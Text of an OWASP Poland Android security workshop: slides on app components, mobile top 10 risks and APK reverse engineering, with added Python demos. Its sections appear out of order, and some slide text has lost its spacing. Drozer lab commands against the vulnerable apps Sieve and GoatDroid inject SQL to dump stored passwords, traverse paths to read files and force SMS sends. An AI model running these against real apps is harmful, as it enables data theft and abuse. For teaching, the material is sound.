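import secrets
import time


class SessionStore:
    def __init__(self, ttl_seconds=1800, clock=time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock
        self._sessions = {}        # token -> {"user": ..., "expires": ...}

    @staticmethod
    def new_token():
        """256 random bits from the OS CSPRNG, URL-safe base64 encoded;
        nothing derived from device IDs, usernames or timestamps."""
        return secrets.token_urlsafe(32)

    def create(self, user):
        token = self.new_token()
        self._sessions[token] = {"user": user, "expires": self.clock() + self.ttl}
        return token

    def resolve(self, token):
        """Return the user for a live token, else None; expired tokens are
        purged on sight so they cannot be replayed later."""
        session = self._sessions.get(token)
        if session is None:
            return None
        if self.clock() >= session["expires"]:
            del self._sessions[token]
            return None
        return session["user"]

    def invalidate(self, token):
        """Server-side logout: the token stops working immediately."""
        self._sessions.pop(token, None)

    def rotate(self, old_token, user):
        """Authentication state changed (login, re-login as someone else,
        privilege change): kill the old session and issue a fresh token."""
        self.invalidate(old_token)
        return self.create(user)

    def invalidate_user(self, user):
        """Destroy every session of a user, e.g. after a password change."""
        stale = [t for t, s in self._sessions.items() if s["user"] == user]
        for token in stale:
            del self._sessions[token]
        return len(stale)

    def live_count(self):
        return sum(1 for s in self._sessions.values() if self.clock() < s["expires"])


class FakeClock:
    """Manually advanced clock so the tests need not sleep for 30 minutes."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


if __name__ == "__main__":
    clock = FakeClock()
    store = SessionStore(clock=clock)
    token = store.create("alice")
    print(store.resolve(token))        # alice
    clock.advance(1800)
    print(store.resolve(token))        # None: expired after 30 minutes
```

Because the store only knows tokens it issued itself, a client-supplied value such as a device ID never resolves to a user, which is the guessable-token case from the how-to-find slide.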
Thank you
pawelrzepaoutlookcom
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – Assembly code
• Why disassembling and not decompiling?
Decompiling
(diagram: DEX → JAR → JAVA)
Decompiling – dex2jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
(screenshots: JD-GUI, Luyten)
Disassembling
(diagram: DEX → SMALI)
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
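When Apktool rebuilds classes.dex from edited Smali, part of the job is recomputing the header's Adler-32 checksum and SHA-1 signature, because the runtime rejects a dex whose header no longer matches its body. The parser below is an added example, not apktool's or the workshop's code: it reads the 0x70-byte header as laid out in the Dalvik executable format, verifies both digests, and shows a one-byte edit breaking them and fix_header() restoring them. The dex image it works on is constructed (a header plus a tiny data section, no classes):

```python
"""Parse and verify a DEX header (magic, Adler-32 checksum, SHA-1 signature,
section table) and recompute the digests after a modification.  Constructed
example; build_sample_dex() makes a minimal header-plus-data image."""
import hashlib
import struct
import zlib

HEADER_FMT = "<8sI20s20I"                  # magic, checksum, signature, 20 uint32
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 0x70
ENDIAN_CONSTANT = 0x12345678
FIELDS = ["file_size", "header_size", "endian_tag", "link_size", "link_off",
          "map_off", "string_ids_size", "string_ids_off", "type_ids_size",
          "type_ids_off", "proto_ids_size", "proto_ids_off", "field_ids_size",
          "field_ids_off", "method_ids_size", "method_ids_off",
          "class_defs_size", "class_defs_off", "data_size", "data_off"]


def fix_header(dex):
    """Recompute the signature (SHA-1 of everything after it) and then the
    checksum (Adler-32 of everything after it); signature first, because
    the checksum covers the signature bytes."""
    body = bytearray(dex)
    body[12:32] = hashlib.sha1(body[32:]).digest()
    body[8:12] = struct.pack("<I", zlib.adler32(bytes(body[12:])) & 0xFFFFFFFF)
    return bytes(body)


def parse_header(dex):
    """Return header fields plus checksum_ok / signature_ok / layout_ok flags."""
    if len(dex) < HEADER_SIZE:
        raise ValueError("file shorter than a dex header")
    magic, checksum, signature, *values = struct.unpack_from(HEADER_FMT, dex, 0)
    if magic[:4] != b"dex\n" or magic[7:8] != b"\0":
        raise ValueError("not a dex file: %r" % magic)
    info = dict(zip(FIELDS, values))
    info["version"] = magic[4:7].decode("ascii")
    info["checksum_ok"] = checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF)
    info["signature_ok"] = signature == hashlib.sha1(dex[32:]).digest()
    info["layout_ok"] = (info["endian_tag"] == ENDIAN_CONSTANT
                         and info["header_size"] == HEADER_SIZE
                         and info["file_size"] == len(dex))
    return info


def build_sample_dex():
    """Constructed minimal image: a valid header followed by a data section
    and no string/type/class tables."""
    data = b"constructed data section\0\0\0\0"
    values = [0] * 20
    values[FIELDS.index("file_size")] = HEADER_SIZE + len(data)
    values[FIELDS.index("header_size")] = HEADER_SIZE
    values[FIELDS.index("endian_tag")] = ENDIAN_CONSTANT
    values[FIELDS.index("data_size")] = len(data)
    values[FIELDS.index("data_off")] = HEADER_SIZE
    raw = struct.pack(HEADER_FMT, b"dex\n035\0", 0, bytes(20), *values) + data
    return fix_header(raw)


def patch_byte(dex, offset, value):
    """Simulate an edit to the body (what a Smali change becomes)."""
    body = bytearray(dex)
    body[offset] = value
    return bytes(body)


if __name__ == "__main__":
    dex = build_sample_dex()
    print(parse_header(dex))
    broken = patch_byte(dex, HEADER_SIZE + 1, ord("X"))
    print(parse_header(broken)["checksum_ok"], parse_header(broken)["signature_ok"])
    print(parse_header(fix_header(broken))["checksum_ok"])
```

Run parse_header() on a real classes.dex pulled from an APK to confirm the digests before and after a Smali round-trip; a checksum or signature mismatch on an unmodified file means the extraction, not the app, is broken.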
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Agenda
Android fundamentals Application components security Coffee break (free cookies ) OWASP top 10 mobile risks Reverse engineering amp malware analysis
Android fundamentals
Andrii SygidaOWASP Poland24022016
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application Framework
• Activity Manager – manages the activity life cycle of applications
• Content Providers – manage the data sharing between applications
• Telephony Manager – manages all voice calls
• Location Manager – location management using GPS or cell towers
• Resource Manager – manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers (Google Play)
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
• By default only Google Play and other pre-installed app stores are allowed to install apps
• The vast majority of installs come from Google Play
Verify Apps
• Apps are verified prior to install
• Warn for or block Potentially Harmful Applications
• Over 10 million installs verified every day
• Verifying is on and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
(diagram: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="..." />
• Components and their attributes
(figure: AndroidManifest.xml)
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Component attributes:
• debuggable
• enabled
• exported
• permission
(figure: example component attributes for Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android.
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Drozer is installed in the default package of AppUse. Use it with adb, so it's enough to just "click-and-play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme (diagram: apps A, B and E)
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions
  run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
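To show what the two queries above do inside the provider, here is an added Python/sqlite3 simulation (not Sieve's real code): query_vulnerable builds the statement the way a provider does when it pastes the caller's projection and selection into SQL, while query_hardened allow-lists the projection and binds the only filter it accepts. The table layout and rows are constructed to match the output shown above.

```python
import sqlite3

# Columns the hardened provider is willing to expose from Passwords.
PASSWORD_COLUMNS = ("_id", "service", "username", "password")


def make_db():
    """Constructed stand-in for the Sieve database: the Passwords table the
    provider is meant to expose and the Key table it is not."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Key VALUES ('thisismypassword', '9876');
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password TEXT);
        INSERT INTO Passwords (service, username, password)
            VALUES ('Gmail', 'alice', 'zzz');
    """)
    return db


def query_vulnerable(db, projection=None, selection=None):
    """ContentProvider.query() the unsafe way: the caller-supplied projection
    and selection are concatenated into the SQL text, so '* FROM Key--' as a
    projection silently swaps the table, and a stray quote in the selection
    surfaces the raw SQLite error to the caller."""
    cols = ", ".join(projection) if projection else "*"
    where = " WHERE (%s)" % selection if selection else ""
    return db.execute("SELECT %s FROM Passwords%s" % (cols, where)).fetchall()


def probe_selection(db, selection):
    """Return the database error text a raw selection provokes (None if it
    ran), which is what the first dz> command above surfaces."""
    try:
        query_vulnerable(db, selection=selection)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def query_hardened(db, projection=None, row_id=None):
    """Only columns from an allow-list reach the SQL (the effect of a
    projection map / strict mode on SQLiteQueryBuilder); the only filter the
    caller can express is a row id, bound as a parameter rather than spliced."""
    for col in projection or ():
        if col not in PASSWORD_COLUMNS:
            raise ValueError("unknown column in projection: %r" % col)
    cols = ", ".join(projection) if projection else ", ".join(PASSWORD_COLUMNS)
    sql = "SELECT %s FROM Passwords" % cols
    args = ()
    if row_id is not None:
        sql += " WHERE _id = ?"
        args = (int(row_id),)
    return db.execute(sql, args).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(db, projection=["* FROM Key--"]))  # leaks the Key table
    print(probe_selection(db, "'"))                           # raw SQLite error text
    try:
        query_hardened(db, projection=["* FROM Key--"])
    except ValueError as exc:
        print("blocked:", exc)
    print(query_hardened(db, projection=["service", "username"], row_id=1))
```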
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers attacks
  <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  ...
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null,
                          bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers attacks
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
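As an added example (not from the workshop or GoatDroid), a small Python audit of a constructed AndroidManifest.xml that checks for the two defenses above across all four component types: it flags exported Activities, Services, Content providers and Broadcast receivers (including a receiver shaped like the SOCIAL_SMS one) that carry no android:permission or only a normal-level custom one, and flags android:debuggable. The package, component and permission names are made up.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "provider", "receiver")
STRONG_LEVELS = ("signature", "signatureOrSystem")

# Constructed sample manifest (hypothetical package, not GoatDroid's real file):
# a receiver shaped like the SOCIAL_SMS one, a receiver guarded by a
# signature-level custom permission, a provider with nothing set, and a
# service that is not exported.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.example.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="org.example.fourgoats.permission.SOCIAL_SMS"
              android:protectionLevel="signature" />
  <application android:debuggable="true">
    <activity android:name=".MainActivity" android:exported="true" />
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver">
      <intent-filter>
        <action android:name="org.example.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name="broadcastreceivers.GuardedReceiver"
              android:permission="org.example.fourgoats.permission.SOCIAL_SMS">
      <intent-filter>
        <action android:name="org.example.fourgoats.GUARDED_ACTION" />
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="org.example.fourgoats.provider" />
    <service android:name=".InternalService" android:exported="false" />
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem):
    """Pre-Android-12 default rules: an explicit android:exported wins; otherwise
    a component with an <intent-filter> is exported, a <provider> is treated as
    exported (the old API < 17 default), and everything else is private."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (tag, name, problem) tuples for: exported components without a
    permission, exported components whose custom permission is not
    signature-level, and a debuggable application."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if (attr(app, "debuggable") or "").lower() == "true":
        findings.append(("application", root.get("package", ""), "android:debuggable=true"))
    # protectionLevel of every custom permission declared in this manifest
    levels = {attr(p, "name"): attr(p, "protectionLevel") or "normal"
              for p in root.iter("permission")}
    for tag in COMPONENT_TAGS:
        for comp in app.iter(tag):
            if not is_exported(comp):
                continue
            name = attr(comp, "name")
            perm = attr(comp, "permission")
            if perm is None:
                findings.append((tag, name, "exported without android:permission"))
            elif perm in levels and levels[perm] not in STRONG_LEVELS:
                findings.append((tag, name, "exported, guarded only by %s-level permission %s"
                                 % (levels[perm], perm)))
    return findings


if __name__ == "__main__":
    for tag, name, problem in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-45s %s" % (tag, name, problem))
```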
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about...
Before we start... the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in sdcard before and after installing the application
• Analyze package files at different stages
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
  if (presented_cert == pinned_cert)
      Start_connection();
  else
      Drop_connection();
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and...
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened...
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain)
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
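As an added example (not from the slides), a Python scanner for the logcat step above: it parses logcat lines in threadtime format, optionally restricted to one app's PID, and flags messages that look like a credential, a bearer token/JWT or a GPS position, which is what "NEVER log any sensitive information" asks you to catch. The log lines, app name and token values are constructed.

```python
import re

# Constructed logcat excerpt (adb logcat -v threadtime style) for a hypothetical app
# with PID 4242; the last line belongs to the system server (PID 1200).
SAMPLE_LOGCAT = """\
02-24 10:15:01.123  4242  4242 D LoginActivity: attempting login for user=alice
02-24 10:15:01.456  4242  4242 D LoginActivity: password=S3cret!Pass
02-24 10:15:02.001  4242  4261 I OkHttp  : Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.abc123
02-24 10:15:02.300  4242  4261 I Analytics: sending event {"lat":51.1079,"lon":17.0385}
02-24 10:15:03.010  1200  1200 I ActivityManager: Displayed org.example.app/.MainActivity
"""

# date time pid tid level tag: message
LOGCAT_LINE = re.compile(
    r"^(?P<date>\d\d-\d\d) (?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+) "
    r"(?P<level>[VDIWEF]) (?P<tag>[^:]+?)\s*: (?P<msg>.*)$"
)

# What counts as "sensitive" for this scan; extend per application.
PATTERNS = {
    "password": re.compile(r"\b(pass(word|wd)?|pwd|pin)\s*[=:]\s*\S+", re.I),
    "bearer token": re.compile(r"\bBearer\s+[A-Za-z0-9\-_.]+", re.I),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+"),
    "location": re.compile(r'"?(lat|latitude)"?\s*[=:]\s*-?\d+\.\d+', re.I),
}


def parse_logcat(text):
    """Yield dicts for lines that match the threadtime layout; skip the rest."""
    for raw in text.splitlines():
        m = LOGCAT_LINE.match(raw)
        if m:
            yield m.groupdict()


def scan_logcat(text, pid=None):
    """Return (kind, tag, message) for every message that matches a sensitive
    pattern, limited to one process when pid is given (the app under test)."""
    findings = []
    for entry in parse_logcat(text):
        if pid is not None and int(entry["pid"]) != pid:
            continue
        for kind, pattern in PATTERNS.items():
            if pattern.search(entry["msg"]):
                findings.append((kind, entry["tag"].strip(), entry["msg"]))
    return findings


if __name__ == "__main__":
    for kind, tag, msg in scan_logcat(SAMPLE_LOGCAT, pid=4242):
        print("%-13s %-14s %s" % (kind, tag, msg))
```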
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then... your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to...
• ...stay reasonable when you're going to follow advice from the Internet...
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it...):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea...
Broken Cryptography - example
• ...but not when you're hardcoding the passwords to decrypt it in the code...
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections: dz> run scanner.provider.injection -a <package_name>
• Data path traversal: dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
